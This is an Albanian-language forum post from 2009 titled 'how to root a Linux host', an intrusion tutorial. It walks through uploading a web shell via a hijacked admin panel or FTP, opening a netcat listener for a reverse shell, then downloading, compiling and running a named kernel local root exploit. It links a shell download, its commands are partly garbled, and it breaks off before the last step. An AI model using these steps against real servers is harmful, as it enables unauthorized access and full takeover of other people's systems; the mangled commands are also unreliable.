Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Si te bejm root nje host ne linux

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Si te bejm root nje host ne linux   Fri Dec 04, 2009 1:01 pm

Para së gjithash, ne duhet të upload-ojmë një shell në host. Ne mund të bëjmë këtë nëpërmjet admincp, ose ne mund të përdorim protokollin File Transfer (FTP server).

Si mund të upload-ojmë një shell përmes admin panel:

1. Ne do të hyjm si administrator.
2. Ne do të gjejmë një vend ku mund të upload-ojmë një fotografi ose një video.
3. Pasi të kemi gjetur një vend, zgjidhni shell dhe upload atë atje. ( Ju kisha rekomandu GNYShell, mund ta gjeni në http://www.darkc0de.biz/sh3llz/gnyshell.txt )
4. Ajo duhet për me tregu një shembull nga foto-ja që kemi bërë upload, pastaj klikojmë copy image location, dhe shohim shellin


Si mund të upload-ojmë një shell përmes protokollit File Transfer (FTP):

1. Shkojmë logohemi n'ftp.
2. Ne do të përdorim një klient FTP si FileZilla të upload-ojmë një shell.
3. Shkoni tek url-ja ku e vendosëm shellin .

Tani, ne mund të fillojme me komandat nga "execute" funksion të shell, por unë ju rekomandoj Back-Connect.
Për ta bërë këtë, ju duhet netcat. Pasi ne e vendosim atë në directory tonë, ne duhet të hapur komandën e menjëhershëm, dhe përdorimi i disa komanda për të shkuar në directory.

Shembull:
cd \Users\bL3nDi.b0y\Downloads\Netcat

Prej këtu do të përdorim opcionin e shellit back-connect. Për këtë tutorial ne do të spejgojmë në portin 1337.

Tani, ne do të shkruajmë këtë komandë në netcat:

Kodi:

nc-l-n-v-p 1337

Duhet te marrim nje pergjigje si "listening on [any] 1337 ..."

Dhe klikoni në Connect tek shelli juaj.

Tani, ne do të shkruajmë uname-a ose id

Duhet të tregojë diçka si kjo:
Kodi:

Zx8.rapidns.com Linux 2.6.18-8.el5 # 1 SMP Tue Feb 15 19:57:35 EDT 2007 i686
uid = 99 <nobody> gid = 99 <nobody> grupe = 99 <nobody>

Tani, ne duam të upload-ojmë ose wget (rrëmbej një file nga serveri).

wgetting shfrytëzuar nga milw0rm:
1. Tash ne e shkruajm këtë kod:
wget Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit
2. Tash n'server ruhet si 5.093 . Ne tani do të përpilojnë atë nëpërmjet lloj gcc (komandën më poshtë
5093.c gcc-o pwn
3. Për të ekzekutuar atë, ne do shkruajmë. / Pwn.

Uploadoni nje fajll tek serveri:
1. Ne do te upload-ojmë nje file duke shfrytëzuar shellin.
2. Ne do ta ekzekutojmë atë duke përdorur këtë komand:
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Si te bejm root nje host ne linux
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Ekzorcizmi
» Dua te meditoj !
» Joga
» Ndihme nga Magjia
» Si mund te mesosh magji..???

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: